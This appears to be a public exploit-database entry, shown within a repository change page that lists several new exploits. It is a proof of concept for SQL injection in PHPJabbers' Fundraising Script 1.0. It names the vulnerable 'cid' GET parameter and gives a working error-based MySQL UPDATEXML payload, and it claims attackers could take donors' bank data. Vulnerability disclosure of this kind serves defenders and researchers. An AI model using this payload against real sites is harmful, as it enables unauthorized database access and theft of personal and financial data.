a5920da7af
10 changes to exploits/shellcodes/ghdb Ricoh Printer - Directory and File Exposure Blood Bank & Donor Management System using v2.2 - Stored XSS Equipment Rental Script-1.0 - SQLi Bank Locker Management System - SQL Injection Fundraising Script 1.0 - SQLi PHP Shopping Cart 4.2 - Multiple-SQLi 7 Sticky Notes v1.9 - OS Command Injection Typora v1.7.4 - OS Command Injection
29 lines
No EOL
1.1 KiB
Text
29 lines
No EOL
1.1 KiB
Text
## Title: Fundraising Script-1.0 SQLi
|
|
## Author: nu11secur1ty
|
|
## Date: 09/13/2023
|
|
## Vendor: https://www.phpjabbers.com/
|
|
## Software: https://www.phpjabbers.com/fundraising-script/#sectionDemo
|
|
## Reference: https://portswigger.net/web-security/sql-injection
|
|
|
|
## Description:
|
|
The `cid` parameter appears to be vulnerable to SQL injection attacks.
|
|
The payload ' was submitted in the cid parameter, and a database error
|
|
message was returned.
|
|
The database is empty, but if it is not, this will be over for the
|
|
money of the donors and their bank accounts!
|
|
The attacker can steal all information from the database!
|
|
|
|
[+]Payload:
|
|
mysql
|
|
|
|
Parameter: cid (GET)
|
|
Type: error-based
|
|
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
|
|
Payload: controller=pjFront&action=pjActionLoadCampaign&cid=(UPDATEXML(1741,CONCAT(0x2e,0x71626b7071,(SELECT
|
|
(ELT(1741=1741,1))),0x7162787171),3873))
|
|
|
|
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Fundraising-Script-1.0
|
|
|
|
System Administrator - Infrastructure Engineer
|
|
Penetration Testing Engineer
|
|
nu11secur1ty <http://nu11secur1ty.com/> |